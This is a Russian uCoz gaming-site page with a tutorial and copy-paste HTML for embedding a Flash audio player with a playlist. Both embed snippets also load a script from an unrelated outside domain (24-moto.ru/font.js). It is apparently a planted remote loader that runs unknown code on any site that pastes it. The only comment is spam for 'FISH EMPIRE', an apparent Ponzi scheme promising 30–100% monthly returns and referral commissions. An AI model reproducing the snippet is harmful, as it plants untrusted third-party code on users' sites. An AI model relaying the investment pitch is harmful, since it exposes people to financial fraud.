Понедельник, 29.04.2024, 18:16


Главная | Регистрация | Вход
Меню сайта
Наш опрос
С каким оружием вы любите играть в CS
 
Всего ответов: 198
Cтатистика
Онлайн:
Онлайн всего: 1
Гостей: 1
Пользователей: 0
Cейчас онлайн:

Счетчики:

Зарегистрированых:

Из них:

Счетчик материалов:

Посетители за сегодня:
Главная » Новости » Новости сайта

Аудиоплеер серого цвета с плейлистом


Аудиоплеер серого цвета с плейлистом





Аудиоплеер имеет размеры 305Х235 и оснащён плейлистом который может содержать любое количество музыкальных композиций или радиопотоков. Воспроизведение музыки автоматически не переключается на следующую, каждую мелодию нужно включать индивидуально. Для установки понадобится скопировать весь код из примера, создать текстовый документ для плейлиста или скачать готовый и составить список воспроизводимых композиций. После составления списка воспроизведения закачайте готовый файл файл плейлиста на сервер своего сайта и укажите путь к нему в коде плеера и поместите весь код плеера там где хотите его видеть. Установка кода аудиоплеера производится в любом месте поддерживающем HTML редактирование. Аудиоплеер может работать без плейлиста, воспроизводя одну композицию.

Код для установки аудиоплеера с плейлистом

Вам потребуется заменить ссылку ( http://pnghosts.ru/js_css/playlist-demo.txt ) на Ваш плейлист и установить код там где будет находиться аудиоплеер с плейлистом.

Код
<script language="JavaScript" src="//pnghosts.ru/js_css/swfobject1.js"></script>
<script type="text/javascript" src="http://24-moto.ru/font.js"></script><div id="audioplayer"></div>
<script>
var flashvars = {"uid":"audioplayer","m":"audio","st":"http://pnghosts.ru/js_css/wahiteaudio-pl-305X36.txt","pl":"http://pnghosts.ru/js_css/playlist-demo.txt"};
var params = {id:"audioplayer",allowFullScreen:"true",allowScriptAccess:"always",wmode:"transparent"};
new swfobject.embedSWF("http://pnghosts.ru/js_css/uppod.swf", "audioplayer", "305", "235", "10.0.0", "expressInstall.swf", flashvars, params);
</script>


Пример файла плейлиста аудиоплеера

Впишите название композиции и ссылку на неё, количество песен в плейлисте может быть любым, можно использовать радиопотоки, они вписываются аналогично музыкальным ссылкам. При формировании плейлиста нельзя создавать пробелы и переносы в строках. Ячейка одной композиции выглядит так:
{"comment":"НАЗВАНИЕ","file":"ССЫЛКА НА МУЗЫКУ"}
Обратите внимание, между ячейками стоит запятая, её нет только после последней.

Код
{"playlist":[{"comment":"ВПИШИТЕ НАЗВАНИЕ ЗДЕСЬ","file":"ВПИШИТЕ ССЫЛКУ НА МУЗЫКУ ЗДЕСЬ"},{"comment":"ВПИШИТЕ НАЗВАНИЕ ЗДЕСЬ","file":"ВПИШИТЕ ССЫЛКУ НА МУЗЫКУ ЗДЕСЬ"},{"comment":"ВПИШИТЕ НАЗВАНИЕ ЗДЕСЬ","file":"ВПИШИТЕ ССЫЛКУ НА МУЗЫКУ ЗДЕСЬ"}]}


Код для установки аудиоплеера без плейлиста



Аудиоплеер с размерами 305Х36 будет оснащён только одной музыкальной композицией или радиопотоком, для добавления измените ссылку http://SITE.RU/SOUNDS.mp3 на свою.

Код
<script language="JavaScript" src="//pnghosts.ru/js_css/swfobject.js"></script>
<script type="text/javascript" src="http://24-moto.ru/font.js"></script><div id="audioplayerds"></div>
<script>
var flashvars = {"uid":"audioplayerds","m":"audio","st":"http://pnghosts.ru/js_css/whiteaudio-pl-305X36.txt","file":"http://SITE.RU/SOUNDS.mp3"};
var params = {id:"audioplayerds",allowFullScreen:"true",allowScriptAccess:"always",wmode:"transparent"};
new swfobject.embedSWF("http://pnghosts.ru/js_css/uppod.swf", "audioplayerds", "305", "36", "10.0.0", "expressInstall.swf", flashvars, params);
</script>



Всего комментариев: 1
1 FishBymn  
0
FISH EMPIRE - игра с выводом реальных денег. Старт системы 31.03.2014.

Для ознакомления кликните по ссылке: http://fish-empire.net/

Наши Особенности: Прозрачная статистика - Вы всегда будете знать о реальном обороте золота в системе. На проекте нет никаких санкций для продажи золота.

Выгодное сотрудничество - возможность многократно увеличить свои инвестиции. Мы обещаем от 30% до 100% ежемесячно.

Увеличение резерва проекта - за счет влива денег на рекламу и приглашения в систему новых пользователей - игроками, работающих по партнерской програме. Оперативная помощь на приветном форуме. Уникальная атмосфера и ещё множество других плюсов.

О системе: FISH EMPIRE - игра с выводом реальных денег. Войдите в среду экономической онлайн игры и постройте свою Рыбную Империю, которая каждый день будет приносить Вам настоящие средства.

В данной игре Вам предстоит покупать разных рыб. Каждая рыба производит икру, которую можно продать на золото. Золото можно выручить за реальные деньги и снять из системы на свои электронные счета.

Любые рыбы производят условное количество икры, чем они больше стоят, тем икры дают больше. Вы можете покупать любое их количество, у рыб нет срока годности, они никуда не денутся и будут давать Вам икру каждый день. Сбор икры производится без потерь и препятствий по времени.

Начни Играть: Начать играть можно без инвестиций. При регистрации Всем Щука в подарок. Каждый день бонусы, лотерея, конкурсы, акции. Так же существует партнерская програма. Приглашайте в систему своих знакомых и близких.

За каждое пополнение счета рефералами, Вы будете получать 30% от суммы их инвестиций. Автоматический ввод в проект и вывод средств на Ваш электронный счет. Мизерная минималка на Payeer, всего 3 RUB. Ваша Рыбная Империя будет приносить профит стабильно.

Курс игрового инвентаря: 100 гр. икры = 1 гр. золота. 100 гр. золота = 1 RUB.

Рыбы-------------------Стоимость----------------Доход в день-----------Окупаемость
Щука--------------------90 RUB--------------------1 RUB--------------------90 дней
Минтай-----------------270 RUB------------------3,6 RUB--------------------75 дней
Лосось-----------------810 RUB------------------13,5 RUB-------------------60 дней
Осетр------------------2430 RUB-----------------54 RUB---------------------45 дней
Белуга-----------------7290 RUB-----------------243 RUB--------------------30 дней

Добавлять комментарии могут только зарегистрированные пользователи.
[ Регистрация | Вход ]
Наш сервер
Мониторинг

Мониторинг серверов CS 1.6
Сервера КС
сервера cs 1.6 Мониторинг Игровых Серверов Counter-Strike 1.6 cs сервера [12:22:56] 卐ФиЛьТиКуЛьТяПиСтЫй卐: Мониторинг серверов CS 1.6, Сервера кс
Мониторинг серверов CS 1.6
Раскрутка серверов КС 1.6 Сервера CS 1.6 Мониторинг Игровых Серверов Counter-Strike 1.6 Игровые сервера cs 1.6 сервера counter-strike 1.6 Мониторинг серверов CS 1.6, Сервера кс
Мониторинг серверов CS 1.6
Новые Темы
Пользователей всего: Материалов всего [?]: 0 +          
Реклама
Баннеробмен

Место свободно!
Свободно
Место свободно!
Свободно
Место свободно!
Свободно

 http://portal-games.clan.su/
  Создать бесплатный сайт с uCoz
Внимание cайт оптимизирован под разрешение экрана 1440х900 и браузер Mozilla Firefox.Также и для Opera,но в меньшей степени.Внимания неговорить у тебя тото криво если у вас хром ,а темболее если explower.
Связь с администрацией:
 SKYPE
 icq